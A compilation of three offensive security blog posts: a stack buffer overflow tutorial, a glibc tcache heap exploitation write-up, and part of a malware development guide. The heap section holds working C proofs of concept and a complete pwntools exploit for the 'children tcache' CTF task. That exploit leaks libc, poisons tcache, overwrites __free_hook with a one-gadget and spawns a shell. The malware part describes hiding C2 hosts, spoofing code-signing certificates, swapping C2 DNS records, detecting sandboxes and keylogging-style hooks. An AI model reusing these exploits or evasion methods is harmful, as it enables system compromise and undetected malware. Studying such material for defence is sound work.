->Then the EBP gets pushed onto the stack, so the EBP can act as the offset reference point for other instructions to access and calculate the memory addresses.

-> We have char array buffer of 5 bytes, but the memory is allocated in terms of WORD. Basically 1 word=4 bytes. Even if you declare a variable or array of 2 bytes it will be allocated as 4 bytes or 1 word. So, here 5 bytes=2 words i.e 8 bytes.

-> So, in our case when inside the function(), the stack will probably be setup as buffer + EBP + RET

-> Now we know that after 12 bytes, the flow of the program will return to main()and the instruction random = 1; will be executed. We want to skip past this instruction by manipulating the RET address to somehow point to the address after 0x0804843c.

->We will now try to manipulate the RET address by doing something like below :-

 

Here, we are introducing an int pointer ret, and we are assigning it the starting address of buffer + 12 .i.e (wait lets see this in a diagram)

-> So, the ret pointer now ends exactly at the start where the return value is actually stored. Now, we just want to add ret pointer with some value which will change the return value in such a manner that it will skip past the return = 1;instruction.

Lets just go back to the disassembled main function and calculate how much we have to add to the ret pointer to actually skip past the assignment instruction.

-> So, we already know we want to skip pass the instruction at address 0x0804843c to address 0x08048443. By subtracting these two address we get 7. So we will add 7 to the return address so that it will point to the instruction at address 0x08048443.

-> And now we will add 7 to the ret pointer.

 

So our final code should look like:

 

So, now we will compile our code.

 

Since we are adding code and re-compiling the program, the memory addresses will get changed.

Lets take a look at the new memory addresses.

-> Now the assignment instruction random = 1; is at address 0x08048452 and the next address which we want the return address to point is 0x08048459. The difference between these addresses is still 7. So we are good till now.

Hopefully by executing this we will get the output as “The value of random is: 0”

HOLY HELL!!!

Why did it gave the Segmentation fault (core dumped)? That means maybe the process is trying to access a memory that doesn’t exist or something.

Note:- Well this was really tricky for me atleast. Computers works in mysterious ways, it is not just mathematics, numbers and science ( Yeah I am being dramatic)

Lets fire up our binary in GDB and see whats wrong.

-> As you can see we set a breakpoint at line 4 and run the program. The breakpoint hits and the program halts. Then we examine the stack top and what we see, the distance between the start of the buffer and the start of return address is not 12, its 13. (It doesn’t even make sense mathematically). Three full block adds up for 12 bytes (4 bytes each) and 1 byte for that ‘A’ i.e 41.

-> Our buffer had value “ABCDE” in it. And A in ASCII hex is 41. From 41 to just right before of the return address 0x08048452, the count is 13 which traditionally is not correct. I still don’t know why the difference is 13 instead of 12, if anyone knows kindly tell me in the comments section.

-> So we just change our code from ret = buffer + 12; to ret = buffer + 13;

Now the final code will look like this:

 

Now, we re-compile it and run and hope its now going to give a desired output.

Before continuing lets see this again in GDB:

> So, we can see now after 7 is added to the ret pointer, the return address is now 0x08048459 which means we have successfully skipped past the assignment instruction and overwritten the return address to manipulate our way around the program flow to alter the program execution.

Till now we learnt a very important part of buffer overflow i.e how to manipulate and overwrite the return address to alter the program execution flow.

Now, lets another example where we can overwrite the return address in more similar ‘buffer overflow’ fashion.

We will use the program from protostar buffer overflow series. You can find more about it here: https://exploit-exercises.com/protostar/

 

Small overview of a program:-

->There is a function win() which has some message saying “code flow successfully changed”. So we assume this is the goal.
-> Then there is the main(), int pointer fp is declared and defined to ‘0’ along with char array buffer with size 64. The program asks for user input using the getsfunction and the input is stored in the array buffer.
-> Then there is an if statement where if fp is not equal to zero then it calls the function pointer jumping to some memory location.

Now we already know that gets function is vulnerable to buffer overflow (visit previous blog) and we have to execute the win() function. So by not wasting time lets find out the where the overflow happens.

First we will compile the code:

 

We know that the char array buffer is of 64 bytes. So lets feed input accordingly.

So, as we can see after the 64th byte the overflow occurs and the 65th ‘A’ i.e 41 in ASCII Hex is overwriting the EIP.

Lets confirm this in GDB:

-> As we see the buffer gets overflowed and the EIP is overwritten with ‘A’ i.e 41.

Now lets find the address of the win() function. We can find this with GDB or by objdump.

Objdump is a tool which is used to display information about object files. It comes with almost every Linux distribution.

The -d switch stands for disassemble. When we use this, every function used in a binary is listed, but we just wanted the address of win() function so we just used grep to find our required string in the output.

So it tells us that the win() function’s starting address is 0804846b. To achieve our goal we just have to pass this address after the 64th byte so that the EIP will get overwritten by this address and execute the win() function for us.

But since our machine is little endian (Find more about it here)we have to pass the address in a slightly different manner (basically in reverse). So the address 0804846b will become \x6b\x84\x04\x08 where the \x stands for HEX value.

Now lets just form our input:

As we can see the win() function is successfully executed. The EIP is also pointing the address of win().

Hence, we have successfully overwritten the return address and exploited the buffer overflow vulnerability.

Thats all for this blog. I am sorry but this blog also went quite long, but I will try to keep the next blog much shorter. And also, in the next blog we will try to play with shellcode.

 

 

children tcache which is one NULL byte buffer overflow on the heap

( Original text by  )

This article is intended for the people who already have some knowledge about heap exploitation. If you already know some heap attacks on glibc<2.26 it’ll be fully understandable to you. But if you don’t, don’t worry — I’ve tried to make this post approachable for everyone with just basic knowledge. If you really know nothing about the topic, I recommend heap-exploitation.

Tcache is an internal mechanism responsible for heap management. It was introduced in glibc 2.26 in the year 2017. It’s objective is to speed up the heap management. Older algorithms are not removed, but they are still used sometimes — for example for bigger chunks, or when an appropriate tcache bin is full. But heap exploitation with this mechanism is a lot easier due to a lack of heap integrity checks.

The convention used in this post is that we call the pointer to the next chunk fd, and to the previous — bk as it is called originally in normal heap chunk.

Tcache overview

You can grab glibc 2.26 from here. The all source code that is interesting for us is located in a file malloc/malloc.c.

In this version of glibc two new functions were created:

static void
tcache_put (mchunkptr chunk, size_t tc_idx)
{
  tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
  assert (tc_idx < TCACHE_MAX_BINS);
  e->next = tcache->entries[tc_idx];
  tcache->entries[tc_idx] = e;
  ++(tcache->counts[tc_idx]);
}

static void *
tcache_get (size_t tc_idx)
{
  tcache_entry *e = tcache->entries[tc_idx];
  assert (tc_idx < TCACHE_MAX_BINS);
  assert (tcache->entries[tc_idx] > 0);
  tcache->entries[tc_idx] = e->next;
  --(tcache->counts[tc_idx]);
  return (void *) e;
}

Both of these functions can be called at the beginning of functions _int_free and __libc_malloc.tcache_put is called when the requested size of the allocated region is not greater than 0x408 and tcache bin that is appropriate for a given size is not full. A maximum number of chunks in one tcache bin is mp_.tcache_count and this variable is set to 7 by default. This variable is set here and the root is at the following piece of code:

/* This is another arbitrary limit, which tunables can change.  Each
   tcache bin will hold at most this number of chunks.  */
# define TCACHE_FILL_COUNT 7
#endif

tcache_get is called when we request a chunk of the size of tcache bin and the appropriate bin contains some chunks. Every tcache bin contains chunks of only one size. From the code above we can see that it is a single linked list, similar to fastbin — it contains only a pointer to a next chunk. Also, the list is LIFO, like in fastbins. But there is a difference — each tcache bin remebers how many chunks belong to this bin in a variable tcache->counts[tc_idx].

What’s strange calloc doesn’t allocate from tcache bin.

If you want to test how tcache behaves, you can use pwndbg and compile malloc_playground.

a@x:~/Desktop/how2heap_mycp$ gdb -q ./mp
pwndbg: loaded 170 commands. Type pwndbg [filter] for a list.
pwndbg: created $rebase, $ida gdb functions (can be used with print/break)


Reading symbols from ./mp...(no debugging symbols found)...done.
pwndbg> r
Starting program: /home/a/Desktop/how2heap_mycp/mp 
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
> malloc 0x50
==> 0x555555559670
> malloc 0x50
==> 0x5555555596d0
> malloc 0x61
==> 0x555555559730
> free 0x555555559670
==> ok
> free 0x5555555596d0
==> ok
> free 0x555555559730
==> ok
> ^C
Program received signal SIGINT, Interrupt.
[...]
pwndbg> bins
tcachebins
0x60 [  2]: 0x5555555596d0 —▸ 0x555555559670 ◂— 0x0
0x70 [  1]: 0x555555559730 ◂— 0x0
fastbins
0x20: 0x0
0x30: 0x0
0x40: 0x0
0x50: 0x0
0x60: 0x0
0x70: 0x0
0x80: 0x0
unsortedbin
all: 0x0
smallbins
empty
largebins
empty
pwndbg> 

Tcache attacks

Due to a lack of integrity checks in tcache, many attacks are easier.

double free

Let’s consider a double free vulnerability as a first example:

#include <stdlib.h>
#include <stdio.h>

int main()
{
	char *a = malloc(0x38);
	free(a);
	free(a);
	printf("%p\n", malloc(0x38));
	printf("%p\n", malloc(0x38));
} 

As a result, we got the same pointer 2 times.

On older glibc (<2.26) to get the same result this attack is a bit more complicated:

#include <stdlib.h>
#include <stdio.h>

int main()
{
	printf("%s","hello\n");
	char *a = malloc(0x38);
	char *b = malloc(0x38);
	free(a);
	free(b);
	free(a);
	printf("%p\n", malloc(0x38));
	printf("%p\n", malloc(0x38));
	printf("%p\n", malloc(0x38));
} 

output:

hello
0x602420
0x602460
0x602420

We additionally need to free another chunk between due to this integrity check — we cannot add a new chunk to a fastbin list when there is already the same chunk on top. printf is called at the beginning because program crashes otherwise. Probably this is because when printf is called for the first time it initializes his buffer by mallocing some area.

House of Spirit

House of Spirit is also super easy:

#include <stdlib.h>
#include <stdio.h>

int main()
{
	long int var[10];
	var[1] = 0x40; // set the size of the chunk to 0x40

	free(&var[2]);
	char *a=malloc(0x38);
	printf("%p %p\n",a ,&var[2]);
}

output:

0x7fff899700c0 0x7fff899700c0

By freeing never allocated region we put it in the tcache bin list. And we can obtain this region when malloc is called with appropriate size as an argument. This is useful when we have the ability to overwrite some pointer by buffer overflow.

In older glibc we needed to put more effort due to this healthcheck. We need to create another fake chunk after the fried one. Like here.

tcache/fastbin poisoning

If we want to exploit malloc to return a pointer to a controlled location we can simply overwrite a pointer to a next chunk. We can forget about this integrity check in older mechanism:

#include <stdlib.h>
#include <stdio.h>

char var[]="aaaaaaaaaaaaaaa";

int main()
{
	long *a = malloc(0x38);
	long *b = malloc(0x38);
	free(a);
	free(b);
	// tcache bin 0x38 contains: b -> a 
	b[0]=&var;
	// tcache bin 0x38 contains: b -> var
	malloc(0x38);
	// tcache bin 0x38 contains: var
	char *c=malloc(0x38);
	printf("%s\n",c);
}

output:

aaaaaaaaaaaaaaa

We cannot do this by freeing only one chunk because each tcache bin remebers how many chunks belong to this bin.

libc leak

If we want to leak the libc address on glibc 2.26 we can do this:

#include <stdlib.h>
#include <stdio.h>

int main()
{
	long *a = malloc(0x1000);
	malloc(0x10);
	free(a);
	printf("%p\n",a[0]);
}  

This program prints fd of the chunk inside an unsorted bin. fd of the last chunk and bk in the first chunk in an unsorted bin are set to a pointer in libc.

If we can request malloc of at most 0x100 size this won’t work because the fried chunk won’t go to an unsorted bin list but to a tcache bin. It works only with older glibc:

#include <stdlib.h>
#include <stdio.h>

int main(int argc , char* argv[])
{
	long *a=malloc(0x100);
	long *b=malloc(0x10);
	free(a);
	printf("%p\n",a[0]);
}

Hopefully if we make tcache bin full (max capacity is 7 chunks), deallocated chunk will be put in unsorted bin:

#include <stdlib.h>
#include <stdio.h>

int main(int argc , char* argv[])
{
	long* t[7];
	long *a=malloc(0x100);
	long *b=malloc(0x10);
	
	// make tcache bin full
	for(int i=0;i<7;i++)
		t[i]=malloc(0x100);
	for(int i=0;i<7;i++)
		free(t[i]);
	
	free(a);
	// a is put in an unsorted bin because the tcache bin of this size is full
	printf("%p\n",a[0]);
} 

tcache attacks summary

More attacks exist for glibc with tcache. For example House of Force works in the same way as previously. Also, it’s easy to make overlapping chunks by overwriting size to a bigger value. After tcache was introduced heap exploitation is much easier. The exception is a buffer overflow by a single NULL byte, like in children tcache CTF task. I used an old attack with chunks of the smallbin size. I prevented them from going into the tcache, by making the tcache bin full.

Children Tcache overview

In this task we have 2 binaries: task and libc

The version of libc is 2.27 but there is no difference between 2.26 and 2.27 for us:

a@x:~/Desktop/children_tcache$ strings libc.so.6 | grep LIBC
[...]
GNU C Library (Ubuntu GLIBC 2.27-3ubuntu1) stable release version 2.27.

Decompiled binary looks like below:

unsigned __int64 new_heap()
{
  signed int i; // [rsp+Ch] [rbp-2034h]
  char *ptr; // [rsp+10h] [rbp-2030h]
  unsigned __int64 size; // [rsp+18h] [rbp-2028h]
  char s; // [rsp+20h] [rbp-2020h]
  unsigned __int64 v5; // [rsp+2038h] [rbp-8h]

  v5 = __readfsqword(0x28u);
  memset(&s, 0, 0x2010uLL);
  for ( i = 0; ; ++i )
  {
    if ( i > 9 )
    {
      puts(":(");
      return __readfsqword(0x28u) ^ v5;
    }
    if ( !pointers[i] )
      break;
  }
  printf("Size:");
  size = read_atoll();
  if ( size > 0x2000 )
    exit(-2);
  ptr = (char *)malloc(size);
  if ( !ptr )
    exit(-1);
  printf("Data:");
  read_data((__int64)&s, size);
  strcpy(ptr, &s);
  pointers[i] = ptr;
  sizes[i] = size;
  return __readfsqword(0x28u) ^ v5;
}

int show_heap()
{
  const char *v0; // rax
  unsigned __int64 v2; // [rsp+8h] [rbp-8h]

  printf("Index:");
  v2 = read_atoll();
  if ( v2 > 9 )
    exit(-3);
  v0 = pointers[v2];
  if ( v0 )
    LODWORD(v0) = puts(pointers[v2]);
  return (signed int)v0;
}

int delete_heap()
{
  unsigned __int64 v1; // [rsp+8h] [rbp-8h]

  printf("Index:");
  v1 = read_atoll();
  if ( v1 > 9 )
    exit(-3);
  if ( pointers[v1] )
  {
    memset((void *)pointers[v1], 0xDA, sizes[v1]);
    free((void *)pointers[v1]);
    pointers[v1] = 0LL;
    sizes[v1] = 0LL;
  }
  return puts(":)");
}

TL;DR:

We can

  • create chunk on the heap and read data into it
  • delete a chunk
  • print data in a chunk

Everything is fine, except new_heap function which is vulnerable to buffer overflow by single NULL byte. Before free, the area is filled with 0xDA byte. We can have max 10 chunks allocated at the same time and maximum requested size of a chunk is 0x2000.

In older version of glibc this attack works:

#include<stdlib.h>
#include<stdio.h>
 
int main()
{
    // alocate 3 chunks
    char *a = malloc(0x108);
    char *b = malloc(0xf8);
    char *c = malloc(0xf8);

    printf("a: %p\n",a);
    printf("b: %p\n",b); 

    free(a);
    
    // buffer overflow b by 1 NULL byte
    b[0xf8] = '\x00'; //clear prev in use of c
    *(long*)(b+0xf0) = 0x210; //We can set prev_size of c to 0x210 bytes
    
    // c have prev_in_use=0 and prev_size=0x210 so it will consolidate 
    // with a and b and it will be put in unsorted bin
    free(c);

    // now we can allocate chunks from the area of  a|b|c
    char *A = malloc(0x108);
    char *B = malloc(0xF8);
    printf("A: %p\n",A); 
    printf("B: %p\n",B);

    free(b);
    // leak libc
    printf("B content: %p\n",((long*)B)[0]);
}

output:

a: 0x602010
b: 0x602120
A: 0x602010
B: 0x602120
B content: 0x7ffff7dd1b78

Normally, when we free chunk of the size of smallbin, there is a check whether its neighbour is freed. If so, it will consolidate with it. When we free c chunk it consolidates with a and b because of 2 reasons:

  • We have cleared the PREV_INUSE bit of chunk c so it thinks that its previous neighbour is freed.
  • We have set prev_size of chunk c to value 0x210 which is a total size of chunks a and b.

This attack can be shorter:

#include<stdlib.h>
#include<stdio.h>
 
int main()
{
    // alocate 3 chunks
    char *a = malloc(0x108);
    char *b = malloc(0xf8);
    char *c = malloc(0xf8);

    printf("a: %p\n",a);
    printf("b: %p\n",b); 

    free(a);
    
    // buffer overflow b by 1 NULL byte
    b[0xf8] = '\x00'; //clear prev in use of c
    *(long*)(b+0xf0) = 0x210; //We can set prev_size of c to 0x210 bytes
    
    // c have prev_in_use=0 and prev_size=0x210 so it will consolidate 
    // with a and b and it will be put in unsorted bin
    free(c);

    // now we can allocate chunks from the area of a|b|c
    char *A = malloc(0x108);
    printf("A: %p\n",A); 

    // leak libc
    printf("B content: %p\n",((long*)b)[0]);
}
a: 0x602010
b: 0x602120
A: 0x602010
B content: 0x7ffff7dd1b78

In the end, we skipped allocation and deletion of B chunk because it is not needed. After c is freed, we have one unsorted bin that contains the area that is a summary of ab and c areas. After we allocated chunk A, the unsorted bin split to 2 parts. One part was returned by malloc, the other part remained at the unsorted bin and the chunk begins at the same place when b.

In our examples, the first allocated chunk has a different size than others which is 0x108. The example would work with 0xf8 but in this challenge, strcpy is used so it breaks on NULL byte so we couldn’t overwrite prev_size by 0x200 value. With size equal to 0x108 we can overwrite prev_size to 0x210.

We can accomplish the same attack on a newer libc, by using the same algorithm. But there is one difference — before freeing chunks we need to make tcache bin full. So the attack below does the same leak as the attack previously but also it goes further. After the leak, it causes double free because Band b point to the same chunk of size 0x1f8. Later, this attack is performed.

#include<stdlib.h>
#include<stdio.h>
 
char* tcache1[7]; 
char* tcache2[7]; 
 
long var;
 
int main()
{
    char *a = malloc(0x108);
    char *b = malloc(0xf8);
    char *c = malloc(0xf8);
	

    printf("a: %p\n",a);
    printf("b: %p\n",b); 
    printf("c: %p\n",c);

    // make 0xf8 tcache full
    for(int i=0;i<7;i++)
        tcache1[i]=malloc(0xF8);
    for(int i=0;i<7;i++)
        free(tcache1[i]);

    // make 0x108 tcache full
    for(int i=0;i<7;i++)
        tcache2[i]=malloc(0x108);
    for(int i=0;i<7;i++)
        free(tcache2[i]);

    free(a); // a goes to an unsorted bin

    tcache1[0]=malloc(0xF8);//creates one free place in 0xf8 tcache 
    // b will go to tcache after free(). 

    // in the CTF task we can only write data to chunks
    // right after mallocing this chunk
    free(b);
    b = malloc(0xf8);
    // buffer overflow b by 1 NULL byte
    b[0xf8] = '\x00'; //clear prev in use of c
    *(long*)(b+0xf0) = 0x210; //We can set prev_size of c to 0x210 bytes
    printf("b: %p\n",b);
   
    // make 0xf8 tcache full
    free(tcache1[0]);

    // c have prev_in_use=0 and prev_size=0x210 so it will consolidate 
    // with a and b and it will be put in unsorted bin
    free(c);
    
    // make 0x108 tcache empty
    for(int i=0;i<7;i++)
        tcache2[i]=malloc(0x108);


    // now we can allocate chunks from the area of a|b|c
    char *A = malloc(0x108);
    printf("A: %p\n",A);

    // leak libc
    printf("b content: %p\n",((long*)b)[0]);

    // make 0x108 tcache full because we can have max 10 chunks allocated 
    for(int i=0;i<7;i++)
        free(tcache2[i]);

    // Both 0xf8 and 0x108 tcache bins are full

    // let's allocate chunk that overlaps b.
    char *B = malloc(0x1F8);
    printf("B: %p\n",B);

    // now, chunks B and b are allocated and have the same address. 
    // now we can use double free and tcache poisoning attack

    // double free
    free(B);
    free(b);
    // now, 0x1F8 tcache bin contains 2 the same chunks 

    // allocate one of them and set next pointer to known address
    b = malloc(0x1F8);
    *(long*)(b) = &var;
    
    malloc(0x1F8);
	
    // the allocated chunk will have an address of variable var
    char *super_pointer = malloc(0x1F8);
	
    printf("%p %p\n",super_pointer,&var);
}

output:

a: 0x55c054fa2260
b: 0x55c054fa2370
c: 0x55c054fa2470
b: 0x55c054fa2370
A: 0x55c054fa2260
b content: 0x7f60c1026ca0
B: 0x55c054fa2370
0x55c053972060 0x55c053972060

And the last step is to implement an exploit in python. It does the same thing as previous code, except that malloc returns to us a region at &__free_hook. Then we overwrite __free_hook to one-gadget RCE. Later it calls free.

from pwn import *

r = remote("localhost", 1337)
#r = remote("54.178.132.125",8763)
pointers = [False]*10

def menu():
    print r.recvuntil("choice: ") 

def new_heap(size, data):
    #find idx
    global pointers
    idx = None
    for i in range(10):
        if not pointers[i]:
            pointers[i] = True
            idx = i
            break
    assert(idx is not None)
	
    r.send("1")
    print r.recvuntil("Size:")
    r.send(str(size))
    print r.recvuntil("Data:")
    r.send(data)
    menu()
    return idx
	
def show_heap(idx):
    r.send("2")
    print r.recvuntil("Index:")
    r.send(str(idx))
    menu()
	
def show_heap_leak(idx):
    r.send("2")
    print r.recvuntil("Index:")
    r.send(str(idx))
    data = r.recvuntil("choice: ")
    addr = data.split("\n")[0]
    addr = addr.ljust(8,"\x00")
    return u64(addr)
	
	
def delete_heap(idx):
    global pointers
    assert (pointers[idx]==True)
    pointers[idx]=False
	
    r.send("3")
    print r.recvuntil("Index:")
    r.send(str(idx))
    menu()
    return None
	
def delete_heap_and_shell(idx):
    global pointers
    assert (pointers[idx]==True)
    pointers[idx]=False
	
    r.send("3")
    print r.recvuntil("Index:")
    r.send(str(idx))
    r.interactive()

tcache1 = [None]*10
tcache2 = [None]*10
	
menu()
a = new_heap(0x108,"a"*10)
b = new_heap(0xf8,"b"*10)
c = new_heap(0xf8,"c"*10)

# make 0xf8 tcache full
for i in range(7):
    tcache1[i] = new_heap(0xF8, "sss"+str(i))
for i in range(7):
    tcache1[i] = delete_heap(tcache1[i])

# make 0x108 tcache full 
for i in range(7):
    tcache2[i] = new_heap(0x108, "sss"+str(i))
for i in range(7):
    tcache2[i] = delete_heap(tcache2[i])

a = delete_heap(a) #a goes to an unsorted bin

tcache1[0] = new_heap(0xF8, "sss0") #create one free place in 0xf8 tcache

# buffer overflow by 1 NULL byte
b = delete_heap(b);
b = new_heap(0xf8,"b"*0xf8) #clear prev in use of c

# Clear prev size
# This is tricki because data to chunk is copied by strcpy which 
# stops copying on NULL byte.
# If we want to clean an region we need to free and allocate several
# chunks that each next size is lower than 1 byte.  
for i in range(0xf8, 0xf3, -1):
    b = delete_heap(b);
    b = new_heap(i-1,(i-1)*"b")

# set prev_size of c to 0x210 bytes
b = delete_heap(b);
b = new_heap(0xF2,"b"*0xf0+"\x10\x02")

# make 0xf8 tcache full
tcache1[0] = delete_heap(tcache1[0])

# c have prev_in_use=0 and prev_size=0x210 so it will consolidate
# with a and b and it will be put in unsorted bin
c = delete_heap(c)

# make 0x108 tcache empty
for i in range(7):
    tcache2[i] = new_heap(0x108, "sss"+str(i))

# now we allocate chunks from area of  a|b|c
A = new_heap(0x108, "AAA")

# leak libc
addr=show_heap_leak(b)
libc_base = addr - 0x3ebca0
free_hook = libc_base + 0x3ed8e8
print "libc base = "+hex(libc_base)
print "free hook = "+hex(free_hook)


# make 0x108 tcache full because we can have max 10 chunks allocated
for i in range(7):
    tcache2[i] = delete_heap(tcache2[i])

# Both 0xf8 and 0x108 tcache bins are ful
	
ADDR_TO_WRITE = free_hook	

# let's allocate chunk that overlaps b.
B = new_heap(0x1f8, "BBB")

# now, chunks B and b are allocated and have the same address. 
# We can use double free and tcache poisoning attack

# double free
delete_heap(B)
delete_heap(b)
# now 0x1F8 tcache bin contains 2 the same chunks

# allocate one of them and set next pointer to known address
b = new_heap(0x1f8, p64(ADDR_TO_WRITE))

new_heap(0x1f8, "kkkk")

# allocated chunk will have an address of &__free_hook, 
# overwrite __free_hook to one-gadget RCE there
super_pointer = new_heap(0x1f8, p64(libc_base + 0x04F322))

# trigger __free_hook that is overwritten to one-gadget RCE
delete_heap_and_shell(b)

References

Malware on Steroids Part 3: Machine Learning & Sandbox Evasion

 

( Original text by Paranoid Ninja )

It’s been a busy month for me and I was not able to save time to write the final part of the series on Malware Development. But I am receiving too many DMs on Twitter accounts lately to publish the final part. So here we are.

If you are reading this blog, I am basically assuming that you know C/C++ and Windows API by now. If you don’t, then you should go back and read my other blogs on Static AV Evasion and Malware Development using WINAPI (basics).

In this post, we will be using multiple ways to evade endpoint detection mechanisms and sandboxes. Machine Learning is applied at two major levels in most organization. One is at the network level where it tries to identify anomalies based on the behavior of network connections, proxy logs and pattern of connections over time. Most Network ML Solutions tend to analyze beacons of malwares and DPI (deep packet inspection) to identify the malware. This is something that Microsoft ATA (Advanced Threat Analytics), or FireEye sandboxes do. On the other hand, we have Endpoint agents like Symantec EP, Crowdstrike, Endgame, Microsoft Cloud Defender and similar monitoring tools which perform behavioral analysis of the code along with signature detection to detect malicious processes.

I will purely be focusing on multiple ways where we can make our malware behave like a legitimate executable or try to confuse the Endpoint agent to evade detection. I’ve used the methods mentioned in this blog to successfully evade Crowdstrike Agent, Symantec EP and Microsoft Windows Cloud Defender, the videos of the latter which I have already posted in my previous blogs. However, you might need to modify or add new techniques as this might become detectable over time. One of the best ways to avoid AV is to disable the Process creation altogether and just use WINAPI. But that would mean carefully crafting your payloads and it would be difficult to port them for shellcoding. That’s the main reason malware authors write their malwares in C, and only selected payloads in shellcode. A combination of these two makes malwares unbeatable on all fronts.

Each of the techniques mentioned below creates a unique signature which most AVs won’t have. It’s more of a trail and error to check which AVs detect which techniques. Also remember that we can use stubs and packers for encryption, but that’s for a different blog post that I will do later.

P.S.: This blog is exclusive of shellcodes, reason being I will be writing a separate blog series on windows Shellcoding later. I will be using encrypted functions during the shellcoding part and not in this post. This post is specifically how Malware authors use C to perform evasions. You can also use the same APIs and code snippets mentioned below to craft a custom malware for Red Teaming.

main():

So, before we start let’s try to get a based understanding of how Machine learning works. Machine learning is purely focused on the behaviour of the user (in case of endpoints). In short, if we sign our malware and try to make it act like a legitimate executable, it becomes really easy to evade ML. I’ve seen people using PowerShell to write reverse shells, but they get easy detectable due to Microsoft’s AMSI (Anti-Malware Scan Interface) which consistently keeps on checking (including and mainly PowerShell) to detect malicious process executions and connections.  For those of you who don’t know, Microsoft uses DMTK(Microsoft Distributed Machine Learning Toolkit) framework which is basically a decision tree based algorithm which specifies whether a file is malicious or not. PowerShell is very tightly controlled by Microsoft and it gets harder over time to evade ML when using PowerShell.

This is the reason I decided to switch to C and C++ to get reverse shells over network so that I could have flexibility at a lower level to do whatever I want. We will be using a lot of windows APIs, encrypted variables and a lot of decision tree of our own to evade ML. This it supposed to work till Microsoft doesn’t start using CNTK framework which is a much better framework than DMTK, but harder to apply at the same time.

Encrypted Host & Process Names

So, the first thing to do is to encrypt our hostname. We can possibly use something as simple as XOR, or any custom complicated mathematical equation to decrypt our encrypted variable to get the hostname. I created a python script which takes a hostname and a character and returns a Xor’d Array:

As you can see, it gives the Key value in integer of the Xor Key, the length of the encrypted array and the whole Encrypted array which we can simply use in a C integer or char array.

The next step is to decrypt this array at runtime and we need to hardcode the key inside the executable. This is the only key that we would be hardcoding into the code. Also, to make it complicated for the reverse engineer, we will write a C function to automatically detect that the last integer is the key and use that to loop through the array to decrypt the encrypted string. Below is how it would look like

So, we are creating a char buffer of the size of EncryptedHost on heap. We are then passing the host, length and decrypted host variable to the Decrypter function. Below is how the Decrypter function looks:

To explain in short, it creates an Encrypted Integer array of our char array  and xors them back again using the key to convert the encrypted value to the original value and stores them in the DecryptedData array we created previously. With the help of this, if someone runs strings, they wouldn’t be able to see any host in the executable. They would need to understand the math and set a proper breakpoint in Debugger to fetch the C2 host. You can create more complicated mathematical equations to decrypt host if required. We can now use this DecryptedData array within our sockets to connect to the remote host.

P.S.: Reverse Engineers & Sandboxes can fetch the C2 names with the help of packet captures and DNS Name Resolutions. It is better to send raw packets to multiple hosts to confuse which one is the real C2 server. But at the same time, this can lead to easy  detection of the malware. Check my Legitimate Domain Routing technique below which is much better than using this.

If you’ve read my previous post, then you know that I created a cmd.exe process using the CreateProcessW winAPI. We can do what we did above for Creating Processes as well. But instead of hardcoding the Encrypted array for the Process to be executed, we will send the process name as an array over network once the executable connects to the C2 Server along with the host. We can also use authentication on C2 server, and only allow it to connect if it sends a proper key. Below is the Code for Creating Processes using Encrypted Char array over sockets

In this way, when a system sandboxes our executable, it won’t know that what process are we executing beforehand inside a sandbox. Below is a much clearer description of what we are doing:

  1. Decrypt C2 host at runtime and connect to host
  2. Receive password and verify if it is right
  3. If the key is right, wait for 5 seconds to receive encrypted array(process name) over socket
  4. Decrypt the received Process and run it using CreateProcessW API

With the help of the above technique, if our C2 is down, then the sandbox/analyst will not be able to find what we are executing since we have not hardcoded any processes to execute.

Code Signing with Spoofed Certs

I wrote a Script in python which can fetch and create duplicate certificates from any website which we can use for code signing. One thing I noticed is that Antiviruses don’t check and verify the whole chain of the certificate. They don’t even verify the authenticity. The main reason being not every antivirus can connect to internet in every organization to fetch and verify the ceritificates for every third party application installed. You can find the Certificate spoofing python script on my GitHub profile here.

And this is the scan results of Windows ML Defender after Signing:

Next thing is we will try to add a few features to our malware to detect if we are running in a sandbox or inside a virtual machine. We will try to evade Sandboxes as much as possible and kill our executable as soon as we find anything suspicious. We need to make sure that our malware doesn’t even look suspicious. Because if it does, then the sandbox will quarantine it and send an alert that there is a suspicious process running. This is worse than detection because this is where most SOC detects the malware and the Red Teaming gets detected.

Legitimate Domain Routing (Evade Proxy Categorization Detection and Endpoint Detection)

This is one of the best techniques I’ve found out till date which almost works every time. Let’s say I buy a C2 domain named abc.com. I will modify the A records so that it points to Microsoft.com or some similar legitimate site for a month or so. When the malware executes on the vicim’s system, it will connect to this domain which will send a normal HTTP reply from Microsoft and the malware will go to sleep for a few hours and then loop into doing the same thing. Now whenever I want to get a reverse shell of my malware, I will simply change the A records of abc.com to my C2 hosting server and it will send a key in HTTP to the malware which will trigger it to fetch shellcode or send a shell back to my C2. This way, our abc.com will also get categorized as a legitimate domain instead of malicious or phishing site. And even the Endpoint systems will not block it since it is contacting a legitimate domain. Over time I’ve also used Symantec’s website to connect as a temporary domain, later changing it to my malicious C2 server.

Check System Uptime & Idletime (Evades Virtual Machine Sandboxes)

If our executable is running in a virtual machine, the uptime will be pretty short since it will boot up, perform analysis on our binary and then shutdown. So, we can check the uptime of the machine and sleep till it reaches 20-30 minutes and then run it. Make sure to use NTP to check the time with external domain, else Sandboxes can fast-forward system time for process executions. Checking via NTP will make sure that correct time is checked. Below is the code to check uptime of a system and also idle time in case required.

Idletime:

Uptime:

Check Mac Address of Virtual Machine (Known OUIs)

Vmware, Virtual box, MS Hyper-v and a lot of virtual machine providers use a fixed MAC Unique identifier which can be used to run in a loop to check if current mac address matches to any of those mentioned in the list. If it is, then it is highly possible that the malware is running in a virtual environment, mostly for the purpose of sandboxing and reverse engineering. Below are the OUIs that I know for the moment. If there are more, do let me know in the comments.

Company and Products MAC unique identifier (s)
VMware ESX 3, Server, Workstation, Player 00-50-56, 00-0C-29, 00-05-69
Microsoft Hyper-V, Virtual Server, Virtual PC 00-03-FF
Parallels Desktop, Workstation, Server, Virtuozzo 00-1C-42
Virtual Iron 4 00-0F-4B
Red Hat Xen 00-16-3E
Oracle VM 00-16-3E
XenSource 00-16-3E
Novell Xen 00-16-3E
Sun xVM VirtualBox 08-00-27

Below is the C code to detect mac address of a Windows machine:

Execute shellcode when a specific key is pressed. (Sleep & hook method)

Here, we are only executing our shellcode/malicious process when the user presses a specific key. For this, we can hook the keyboard and create a list of multiple keys that specify what kind of shellcode needs to be executed. This is basically polymorphism. Every time a different shellcode depending on the key will confuse the Antivirus, and secondly in a sandbox, no one presses any key. So, our malware won’t execute in a sandbox. Below is the Code to hook the keyboard and check the key pressed.

P.S.: Below code can also be used for Keylogging 😉

